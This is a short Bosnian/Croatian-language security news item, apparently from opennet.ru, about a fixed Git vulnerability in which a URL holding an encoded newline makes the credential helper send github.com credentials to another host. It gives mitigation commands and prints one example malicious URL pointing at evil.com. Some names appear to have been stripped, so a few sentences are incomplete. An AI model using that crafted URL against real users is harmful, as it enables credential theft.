korektivna izdanja distribuiranog sistema izvorne kontrole Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 i 2.17.4, u koji je eliminisao () u rukovaocu "", što uzrokuje slanje vjerodajnica pogrešnom hostu kada git klijent pristupi spremištu koristeći posebno formatiran URL koji sadrži znak novog reda. Ranjivost se može koristiti za organiziranje slanja akreditiva sa drugog hosta na server koji kontroliše napadač.
Kada navedete URL kao što je “https://evil.com?%0ahost=github.com/”, rukovalac vjerodajnicama prilikom povezivanja na host evil.com će proslijediti parametre autentifikacije specificirane za github.com. Problem se javlja kada se izvode operacije kao što je "git clone", uključujući obradu URL-ova za podmodule (na primjer, "git submodule update" će automatski obraditi URL-ove navedene u datoteci .gitmodules iz spremišta). Ranjivost je najopasnija u situacijama u kojima programer klonira spremište a da ne vidi URL, na primjer, kada radi sa podmodulima, ili u sistemima koji izvode automatske radnje, na primjer, u skriptama za pravljenje paketa.
Za blokiranje ranjivosti u novim verzijama prosljeđivanje znaka novog reda u bilo kojoj vrijednosti prenesenoj kroz protokol za razmjenu vjerodajnica. Za distribucije, možete pratiti izdavanje ažuriranja paketa na stranicama , , , , , , .
Kao rješenje za blokiranje problema Nemojte koristiti credential.helper kada pristupate javnim spremištima i nemojte koristiti "git clone" u "--recurse-submodules" modu sa neprovjerenim spremištima. Da biste potpuno onemogućili rukovalac credential.helper, što radi i preuzimanje lozinki sa , zaštićeno ili fajl sa lozinkama, možete koristiti naredbe:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
izvor: opennet.ru